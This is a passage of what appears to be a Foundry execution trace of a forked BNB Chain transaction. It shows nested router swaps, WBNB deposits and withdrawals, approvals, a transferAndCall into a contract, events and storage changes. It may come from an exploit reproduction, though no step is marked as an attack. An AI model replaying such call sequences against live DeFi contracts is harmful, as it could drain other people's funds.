    │   │   │   │   │   │   @ 10: 0x00000000000000000000000000035159de99bc4695a5bc4dd35f872ff3078def → 0x00000000000000000000000000035159e9221d997d9142a994d0840c5612bd4f
    │   │   │   │   │   │   @ 8: 0x6782338100000000097a5b59c43aac9e2e160000000b179329bfe1dc408d80fb → 0x6782338a00000000097a4c4d05b2a55959160000000b17a4d20a8784fd69d1f4
    │   │   │   │   │   │   @ 9: 0x0000000000000000000000000000001ccf0127238a12adee6d4e41b877cf6481 → 0x0000000000000000000000000000001ccf012ed4423e6b8c36ddcf8c37f789e8
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [9223] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(1084451101736228096 [1.084e18])
    │   │   │   │   │   ├─ [83] 0x10ED43C718714eb63d5aA57B78B54704E256024E::fallback{value: 1084451101736228096}()
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ emit Withdrawal(src: 0x10ED43C718714eb63d5aA57B78B54704E256024E, wad: 1084451101736228096 [1.084e18])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x0000000000000000000000000000000000000000000000000f0cbe880744d500 → 0
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [55] 0xf573748637E0576387289f1914627d716927F90f::fallback{value: 1084451101736228096}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] [325721336343852503289 [3.257e20], 1084451101736228096 [1.084e18]]
    │   │   │   ├─ [13631] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsIn(27525000000000000000 [2.752e19], [0x4D9927a8Dc4432B93445dA94E4084D292438931F, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD]) [staticcall]
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4773990209911045563457 [4.773e21], 2383695633846558257396 [2.383e21], 1736586122 [1.736e9]
    │   │   │   │   ├─ [2893] 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 157228625307099815180002 [1.572e23], 56133455316422232631 [5.613e19], 1736570644 [1.736e9]
    │   │   │   │   └─ ← [Return] [39431766567751949669486437 [3.943e25], 55909963468094836070 [5.59e19], 27525000000000000000 [2.752e19]]
    │   │   │   ├─ [9035] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(324850208759244488266486 [3.248e23], [0x4D9927a8Dc4432B93445dA94E4084D292438931F, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD]) [staticcall]
    │   │   │   │   ├─ [893] 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 157228625307099815180002 [1.572e23], 56133455316422232631 [5.613e19], 1736570644 [1.736e9]
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4773990209911045563457 [4.773e21], 2383695633846558257396 [2.383e21], 1736586122 [1.736e9]
    │   │   │   │   └─ ← [Return] [324850208759244488266486 [3.248e23], 37794796405583612365 [3.779e19], 18676609101361988353 [1.867e19]]
    │   │   │   ├─ [24596] 0x4D9927a8Dc4432B93445dA94E4084D292438931F::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 324850208759244488266486 [3.248e23])
    │   │   │   │   ├─ emit Approval(owner: 0xf573748637E0576387289f1914627d716927F90f, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 324850208759244488266486 [3.248e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x26d1b1671271407c16b099cfcfaf7778361943f577ebea699585b038371feb35: 0 → 0x0000000000000000000000000000000000000000000044ca2a44385ccfd552f6
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [117455] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForETH(324850208759244488266486 [3.248e23], 0, [0x4D9927a8Dc4432B93445dA94E4084D292438931F, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0xf573748637E0576387289f1914627d716927F90f, 1736586122 [1.736e9])
    │   │   │   │   ├─ [893] 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 157228625307099815180002 [1.572e23], 56133455316422232631 [5.613e19], 1736570644 [1.736e9]
    │   │   │   │   ├─ [28303] 0x4D9927a8Dc4432B93445dA94E4084D292438931F::transferFrom(0xf573748637E0576387289f1914627d716927F90f, 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA, 324850208759244488266486 [3.248e23])
    │   │   │   │   │   ├─ emit Approval(owner: 0xf573748637E0576387289f1914627d716927F90f, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   │   ├─ [2676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(0x4D9927a8Dc4432B93445dA94E4084D292438931F, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA
    │   │   │   │   │   ├─ emit Transfer(from: 0xf573748637E0576387289f1914627d716927F90f, to: 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA, value: 324850208759244488266486 [3.248e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xf9f91d847de21b6b1fa280573cd87e54185c3ba7749e57e8099ff7e14450914d: 0x0000000000000000000000000000000000000000000044ca2a44385ccfd552f6 → 0
    │   │   │   │   │   │   @ 0x68c30d1e7cf26cf365a022b6d20d2d5970bf82fd537440904751b068d86d8081: 0x00000000000000000000000000000000000000000000214b617fd3d9253376e2 → 0x0000000000000000000000000000000000000000000066158bc40c35f508c9d8
    │   │   │   │   │   │   @ 0x26d1b1671271407c16b099cfcfaf7778361943f577ebea699585b038371feb35: 0x0000000000000000000000000000000000000000000044ca2a44385ccfd552f6 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [62816] 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA::swap(0, 37794796405583612365 [3.779e19], 0x10ED43C718714eb63d5aA57B78B54704E256024E, 0x)
    │   │   │   │   │   ├─ [27962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x10ED43C718714eb63d5aA57B78B54704E256024E, 37794796405583612365 [3.779e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA, to: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 37794796405583612365 [3.779e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x0000000000000000000000000000000000000000000000020c821715e10589cd
    │   │   │   │   │   │   │   @ 0xc15b03f8db466dcad5fc466ccba1286dae80bc27548e0b2bb4d36dc85c13f136: 0x0000000000000000000000000000000000000000000000030b021833d69c0a37 → 0x000000000000000000000000000000000000000000000000fe80011df596806a
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [1008] 0x4D9927a8Dc4432B93445dA94E4084D292438931F::balanceOf(0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 482078834066344303446488 [4.82e23]
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 18338658910838620266 [1.833e19]
    │   │   │   │   │   ├─ emit Sync(reserve0: 482078834066344303446488 [4.82e23], reserve1: 18338658910838620266 [1.833e19])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 324850208759244488266486 [3.248e23], amount1In: 0, amount0Out: 0, amount1Out: 37794796405583612365 [3.779e19], to: 0x10ED43C718714eb63d5aA57B78B54704E256024E)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 10: 0x000000000000000000000000000c98250864e26f73a6fff0388a4c008de6f2b4 → 0x000000000000000000000000000c9aba8e34ae00c92224955b24eadd551809fa
    │   │   │   │   │   │   @ 9: 0x00000000000000000000000000000007823445978bd3defeea67851de40c16bc → 0x000000000000000000000000000000078239cc3a945ce8e0eed8ecc2fd59dfa8
    │   │   │   │   │   │   @ 8: 0x6781f7140000000000030b021833d69c0a3700000000214b617fd3d9253376e2 → 0x6782338a000000000000fe80011df596806a0000000066158bc40c35f508c9d8
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [9223] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(37794796405583612365 [3.779e19])
    │   │   │   │   │   ├─ [83] 0x10ED43C718714eb63d5aA57B78B54704E256024E::fallback{value: 37794796405583612365}()
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ emit Withdrawal(src: 0x10ED43C718714eb63d5aA57B78B54704E256024E, wad: 37794796405583612365 [3.779e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x0000000000000000000000000000000000000000000000020c821715e10589cd → 0
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [55] 0xf573748637E0576387289f1914627d716927F90f::fallback{value: 37794796405583612365}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] [324850208759244488266486 [3.248e23], 37794796405583612365 [3.779e19]]
    │   │   │   ├─ [13631] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsIn(45000000000000000 [4.5e16], [0x2AB0e9e4eE70FFf1fB9D67031E44F6410170d00e, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD]) [staticcall]
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4773990209911045563457 [4.773e21], 2383695633846558257396 [2.383e21], 1736586122 [1.736e9]
    │   │   │   │   ├─ [2893] 0xaaa77F0aCDc01CbE71e74f177EFd38697B5a7FEB::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 2116790230104587367463073572011 [2.116e30], 2127686125646517138 [2.127e18], 1736585969 [1.736e9]
    │   │   │   │   └─ ← [Return] [94111180979369584222381947610 [9.411e28], 90352158297182343 [9.035e16], 45000000000000000 [4.5e16]]
    │   │   │   ├─ [9035] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(23026442307977690682874354464 [2.302e28], [0x2AB0e9e4eE70FFf1fB9D67031E44F6410170d00e, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD]) [staticcall]
    │   │   │   │   ├─ [893] 0xaaa77F0aCDc01CbE71e74f177EFd38697B5a7FEB::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 2116790230104587367463073572011 [2.116e30], 2127686125646517138 [2.127e18], 1736585969 [1.736e9]
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4773990209911045563457 [4.773e21], 2383695633846558257396 [2.383e21], 1736586122 [1.736e9]
    │   │   │   │   └─ ← [Return] [23026442307977690682874354464 [2.302e28], 22839280867218755 [2.283e16], 11375291487080673 [1.137e16]]
    │   │   │   ├─ [24673] 0x2AB0e9e4eE70FFf1fB9D67031E44F6410170d00e::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 23026442307977690682874354464 [2.302e28])
    │   │   │   │   ├─ emit Approval(owner: 0xf573748637E0576387289f1914627d716927F90f, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 23026442307977690682874354464 [2.302e28])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x26d1b1671271407c16b099cfcfaf7778361943f577ebea699585b038371feb35: 0 → 0x00000000000000000000000000000000000000004a6706d2befeeb2e4c1b5b20
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [100197] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForETH(23026442307977690682874354464 [2.302e28], 0, [0x2AB0e9e4eE70FFf1fB9D67031E44F6410170d00e, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0xf573748637E0576387289f1914627d716927F90f, 1736586122 [1.736e9])
    │   │   │   │   ├─ [893] 0xaaa77F0aCDc01CbE71e74f177EFd38697B5a7FEB::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 2116790230104587367463073572011 [2.116e30], 2127686125646517138 [2.127e18], 1736585969 [1.736e9]
    │   │   │   │   ├─ [10995] 0x2AB0e9e4eE70FFf1fB9D67031E44F6410170d00e::transferFrom(0xf573748637E0576387289f1914627d716927F90f, 0xaaa77F0aCDc01CbE71e74f177EFd38697B5a7FEB, 23026442307977690682874354464 [2.302e28])
    │   │   │   │   │   ├─ emit Approval(owner: 0xf573748637E0576387289f1914627d716927F90f, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   │   ├─ emit Transfer(from: 0xf573748637E0576387289f1914627d716927F90f, to: 0xaaa77F0aCDc01CbE71e74f177EFd38697B5a7FEB, value: 23026442307977690682874354464 [2.302e28])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x110c55e3b837c8f1f11efad1d18c62c23df8ea7ad240772ff6d297f94e38256a: 0x000000000000000000000000000000000000001ab7b7d6d4c6337516f77f64ab → 0x000000000000000000000000000000000000001b021edda785326045439abfcb
    │   │   │   │   │   │   @ 0x26d1b1671271407c16b099cfcfaf7778361943f577ebea699585b038371feb35: 0x00000000000000000000000000000000000000004a6706d2befeeb2e4c1b5b20 → 0
    │   │   │   │   │   │   @ 0xf9f91d847de21b6b1fa280573cd87e54185c3ba7749e57e8099ff7e14450914d: 0x00000000000000000000000000000000000000004a6706d2befeeb2e4c1b5b20 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [62866] 0xaaa77F0aCDc01CbE71e74f177EFd38697B5a7FEB::swap(0, 22839280867218755 [2.283e16], 0x10ED43C718714eb63d5aA57B78B54704E256024E, 0x)
    │   │   │   │   │   ├─ [27962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x10ED43C718714eb63d5aA57B78B54704E256024E, 22839280867218755 [2.283e16])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xaaa77F0aCDc01CbE71e74f177EFd38697B5a7FEB, to: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 22839280867218755 [2.283e16])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x0000000000000000000000000000000000000000000000000051243477041543
    │   │   │   │   │   │   │   @ 0xb2cb438798b6a80425943ca5e6afac75106327df8155a459aeda5f99ece51147: 0x0000000000000000000000000000000000000000000000001d870f4220b01392 → 0x0000000000000000000000000000000000000000000000001d35eb0da9abfe4f
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [1058] 0x2AB0e9e4eE70FFf1fB9D67031E44F6410170d00e::balanceOf(0xaaa77F0aCDc01CbE71e74f177EFd38697B5a7FEB) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2139816672412565058145947926475 [2.139e30]
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xaaa77F0aCDc01CbE71e74f177EFd38697B5a7FEB) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2104846844779298383 [2.104e18]
    │   │   │   │   │   ├─ emit Sync(reserve0: 2139816672412565058145947926475 [2.139e30], reserve1: 2104846844779298383 [2.104e18])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 23026442307977690682874354464 [2.302e28], amount1In: 0, amount0Out: 0, amount1Out: 22839280867218755 [2.283e16], to: 0x10ED43C718714eb63d5aA57B78B54704E256024E)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 10: 0x000000000000000000013e77858e5855b98740da135231db70ac930284a14e08 → 0x000000000000000000013e780fff01e85a0d60778ae6300508487869b20c2662
    │   │   │   │   │   │   @ 9: 0x0000000000000000000000000000000000000445cbe0d3f4723722f3c2a50e0a → 0x0000000000000000000000000000000000000445cbe17d0bcada4f04f468d1f0
    │   │   │   │   │   │   @ 8: 0x678232f10000000000001d870f4220b01392001ab7b7d6d4c6337516f77f64ab → 0x6782338a0000000000001d35eb0da9abfe4f001b021edda785326045439abfcb
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [9223] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(22839280867218755 [2.283e16])
    │   │   │   │   │   ├─ [83] 0x10ED43C718714eb63d5aA57B78B54704E256024E::fallback{value: 22839280867218755}()
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ emit Withdrawal(src: 0x10ED43C718714eb63d5aA57B78B54704E256024E, wad: 22839280867218755 [2.283e16])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x0000000000000000000000000000000000000000000000000051243477041543 → 0
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [55] 0xf573748637E0576387289f1914627d716927F90f::fallback{value: 22839280867218755}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] [23026442307977690682874354464 [2.302e28], 22839280867218755 [2.283e16]]
    │   │   │   ├─ [81228] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactETHForTokens{value: 43087247999031713753}(0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD], 0xf573748637E0576387289f1914627d716927F90f, 1736586122 [1.736e9])
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4773990209911045563457 [4.773e21], 2383695633846558257396 [2.383e21], 1736586122 [1.736e9]
    │   │   │   │   ├─ [21974] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::deposit{value: 43087247999031713753}()
    │   │   │   │   │   ├─ emit Deposit(dst: 0x10ED43C718714eb63d5aA57B78B54704E256024E, wad: 43087247999031713753 [4.308e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x00000000000000000000000000000000000000000000000255f4a7c4e3721fd9
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x824eb9faDFb377394430d2744fa7C42916DE3eCe, 43087247999031713753 [4.308e19])
    │   │   │   │   │   ├─ emit Transfer(from: 0x10ED43C718714eb63d5aA57B78B54704E256024E, to: 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, value: 43087247999031713753 [4.308e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x66ec1991f6397975a4f4a1234495c6e178d730f45f32c044c0a3953f810d8b92: 0x000000000000000000000000000000000000000000000102cc6c523adc652441 → 0x0000000000000000000000000000000000000000000001052260f9ffbfd7441a
    │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x00000000000000000000000000000000000000000000000255f4a7c4e3721fd9 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [40264] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::swap(0, 21268582376831802091 [2.126e19], 0xf573748637E0576387289f1914627d716927F90f, 0x)
    │   │   │   │   │   ├─ [25171] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::transfer(0xf573748637E0576387289f1914627d716927F90f, 21268582376831802091 [2.126e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, to: 0xf573748637E0576387289f1914627d716927F90f, value: 21268582376831802091 [2.126e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x8a489ea344a3a07b0cdfa9d1a5f7e562e8e7801e934af5b7a32cbede3ef02c99: 0x000000000000000000000000000000000000000000000081386c159f69b3f0f4 → 0x0000000000000000000000000000000000000000000000801142e6a302829609
    │   │   │   │   │   │   │   @ 0x929729c8ede6948f663122c2a6323a9d736d8f553add6927f8c8bc52708f1282: 0 → 0x00000000000000000000000000000000000000000000000127292efc67315aeb
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x824eb9faDFb377394430d2744fa7C42916DE3eCe) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 4817077457910077277210 [4.817e21]
    │   │   │   │   │   ├─ [531] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::balanceOf(0x824eb9faDFb377394430d2744fa7C42916DE3eCe) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2362427051469726455305 [2.362e21]
    │   │   │   │   │   ├─ emit Sync(reserve0: 4817077457910077277210 [4.817e21], reserve1: 2362427051469726455305 [2.362e21])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 43087247999031713753 [4.308e19], amount1In: 0, amount0Out: 0, amount1Out: 21268582376831802091 [2.126e19], to: 0xf573748637E0576387289f1914627d716927F90f)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x6782338a000000000081386c159f69b3f0f4000000000102cc6c523adc652441 → 0x6782338a0000000000801142e6a3028296090000000001052260f9ffbfd7441a
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] [43087247999031713753 [4.308e19], 21268582376831802091 [2.126e19]]
    │   │   │   ├─ [24562] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::approve(0x1FCc3B22955e76Ca48bF025f1A6993685975Bb9e, 21268582376831802091 [2.126e19])
    │   │   │   │   ├─ emit Approval(owner: 0xf573748637E0576387289f1914627d716927F90f, spender: 0x1FCc3B22955e76Ca48bF025f1A6993685975Bb9e, value: 21268582376831802091 [2.126e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x6cdd8cc018d7873cdffe375f9116141f9222a6716a3515704fd097531d57f02f: 0 → 0x00000000000000000000000000000000000000000000000127292efc67315aeb
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [67053] 0x1FCc3B22955e76Ca48bF025f1A6993685975Bb9e::swap(21268582376831802091 [2.126e19], 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD, 0x404460C6A5EdE2D891e8297795264fDe62ADBB75)
    │   │   │   │   ├─ emit LiquidityUpdated(param0: 89989540209008947258373 [8.998e22], param1: 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD, param2: 0x404460C6A5EdE2D891e8297795264fDe62ADBB75)
    │   │   │   │   ├─ emit LiquidityUpdated(param0: 25333762824691422653430 [2.533e22], param1: 0x404460C6A5EdE2D891e8297795264fDe62ADBB75, param2: 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD)
    │   │   │   │   ├─ emit TokensSwapped(param0: 21268582376831802091 [2.126e19], param1: 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD, param2: 0x404460C6A5EdE2D891e8297795264fDe62ADBB75, param3: 0xf573748637E0576387289f1914627d716927F90f)
    │   │   │   │   ├─ [10834] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::transferFrom(0xf573748637E0576387289f1914627d716927F90f, 0x1FCc3B22955e76Ca48bF025f1A6993685975Bb9e, 21268582376831802091 [2.126e19])
    │   │   │   │   │   ├─ emit Transfer(from: 0xf573748637E0576387289f1914627d716927F90f, to: 0x1FCc3B22955e76Ca48bF025f1A6993685975Bb9e, value: 21268582376831802091 [2.126e19])
    │   │   │   │   │   ├─ emit Approval(owner: 0xf573748637E0576387289f1914627d716927F90f, spender: 0x1FCc3B22955e76Ca48bF025f1A6993685975Bb9e, value: 0)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x929729c8ede6948f663122c2a6323a9d736d8f553add6927f8c8bc52708f1282: 0x00000000000000000000000000000000000000000000000127292efc67315aeb → 0
    │   │   │   │   │   │   @ 0x6cdd8cc018d7873cdffe375f9116141f9222a6716a3515704fd097531d57f02f: 0x00000000000000000000000000000000000000000000000127292efc67315aeb → 0
    │   │   │   │   │   │   @ 0x7a8a83883374ebb670026484a5db830e6ee4f911f570e643f60d1dbd68b9ee2d: 0x00000000000000000000000000000000000000000000055c3647fd30410a910b → 0x00000000000000000000000000000000000000000000055d5d712c2ca83bebf6
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [30445] 0x404460C6A5EdE2D891e8297795264fDe62ADBB75::transfer(0xf573748637E0576387289f1914627d716927F90f, 21268582376831802091 [2.126e19])
    │   │   │   │   │   ├─ emit Transfer(from: 0x1FCc3B22955e76Ca48bF025f1A6993685975Bb9e, to: 0xf573748637E0576387289f1914627d716927F90f, value: 21268582376831802091 [2.126e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x7a8a83883374ebb670026484a5db830e6ee4f911f570e643f60d1dbd68b9ee2d: 0x00000000000000000000000000000000000000000000130f7ee7a20fbce9bef0 → 0x00000000000000000000000000000000000000000000130e57be731355b86405
    │   │   │   │   │   │   @ 0x929729c8ede6948f663122c2a6323a9d736d8f553add6927f8c8bc52708f1282: 0 → 0x00000000000000000000000000000000000000000000000127292efc67315aeb
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1d9e8bcf08d097e1c82c99edc18205018fd994ef7677500ba3a4e4c1a2bc38f7: 0x00000000000000000000000000000000000000000000055c316c8a0af9a7910b → 0x00000000000000000000000000000000000000000000055d5895b90760d8ebf6
    │   │   │   │   │   @ 0xd65f861254002b91b7a0ec6bdba7a175d7f48036701f7f1701bdef02f9ce4e11: 0x00000000000000000000000000000000000000000000130f7ee7a20fbce9bef0 → 0x00000000000000000000000000000000000000000000130e57be731355b86405
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [32995] 0x404460C6A5EdE2D891e8297795264fDe62ADBB75::transferAndCall(0xc587d9053cd1118f25F645F9E08BB98c9712A4EE, 21268582376831802091 [2.126e19], 0x00000000000000000000000000000000000000000000000000000000000002a3)
    │   │   │   │   ├─ emit Transfer(from: 0xf573748637E0576387289f1914627d716927F90f, to: 0xc587d9053cd1118f25F645F9E08BB98c9712A4EE, value: 21268582376831802091 [2.126e19])
    │   │   │   │   ├─ emit Transfer(param0: 0xf573748637E0576387289f1914627d716927F90f, param1: 0xc587d9053cd1118f25F645F9E08BB98c9712A4EE, param2: 21268582376831802091 [2.126e19], param3: 0x00000000000000000000000000000000000000000000000000000000000002a3)
    │   │   │   │   ├─ [17758] 0xc587d9053cd1118f25F645F9E08BB98c9712A4EE::onTokenTransfer(0xf573748637E0576387289f1914627d716927F90f, 21268582376831802091 [2.126e19], 0x00000000000000000000000000000000000000000000000000000000000002a3)
    │   │   │   │   │   ├─  emit topic 0: 0xd39ec07f4e209f627a4c427971473820dc129761ba28de8906bd56f57101d4f8
    │   │   │   │   │   │        topic 1: 0x00000000000000000000000000000000000000000000000000000000000002a3
    │   │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000017e29246b23f18791100000000000000000000000000000000000000000000001909bb75aea649d3fc
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 5: 0x000000000000000000000000000002e38186e76b94cecb7b0000000000000420 → 0x000000000000000000000000000002e4a8b01667fc0026660000000000000420
    │   │   │   │   │   │   @ 0x3a16b4b9d86cfde2099101cbc4817a1f3fef7cf964e71eda8f09c167921b4d5c: 0x000000000000000000000000000000000000a3ec00000017e29246b23f187911 → 0x000000000000000000000000000000000000a3ec0000001909bb75aea649d3fc
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x551b89053db4e84625f9a7c682d45fff53afcbdfce4682d5a9ca6be0fb9820af: 0x0000000000000000000000000000000000000000000002e38186e76b94cecb7b → 0x0000000000000000000000000000000000000000000002e4a8b01667fc002666
